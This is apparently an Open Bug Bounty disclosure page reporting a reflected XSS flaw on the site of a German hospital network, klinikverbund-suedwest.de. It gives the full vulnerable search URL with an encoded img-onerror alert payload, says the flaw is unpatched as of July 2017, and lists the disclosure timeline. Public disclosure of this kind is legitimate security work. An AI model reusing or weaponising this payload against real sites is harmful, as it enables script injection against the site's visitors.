logo
DATABASE RESOURCES PRICING ABOUT US

klinikverbund-suedwest.de XSS vulnerability

Description

##### Vulnerable URL: http://www.klinikverbund-suedwest.de/index.php?id=161&tx;_indexedsearch[sword]=a%3E%27%3E%22%3Et%3Ci%3Ep%3Cimg+src%3Dy+onerror%3Dalert%28%2Fopenbugbounty%2F%29%3E&tx;_indexedsearch[submit_button]=Suchen!&tx;_indexedsearch[_sections]=0&tx;_indexedsearch[_freeIndexUid]=_&tx;_indexedsearch[pointer]=0&tx;_indexedsearch[ext]=&tx;_indexedsearch[type]=1&tx;_indexedsearch[defOp]=0&tx;_indexedsearch[media]=-1&tx;_indexedsearch[order]=rank_flag&tx;_indexedsearch[group]=flat&tx;_indexedsearch[lang]=-1&tx;_indexedsearch[desc]=0&tx;_indexedsearch[results]=10 ##### Details: Description| Value ---|--- Patched:| No Latest check for patch:| 29.07.2017 Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 883268 VIP website status:| No Check klinikverbund-suedwest.de SSL connection:| (Grade: A) ##### Coordinated Disclosure Timeline: Description| Value ---|--- Vulnerability submitted via Open Bug Bounty| 6 June, 2017 15:40 GMT Generic security notifications sent to website owner| 6 June, 2017 15:42 GMT Customized security notification sent to website owner| 6 June, 2017 15:42 GMT Vulnerability details disclosed by researcher| 4 July, 2017 16:15 GMT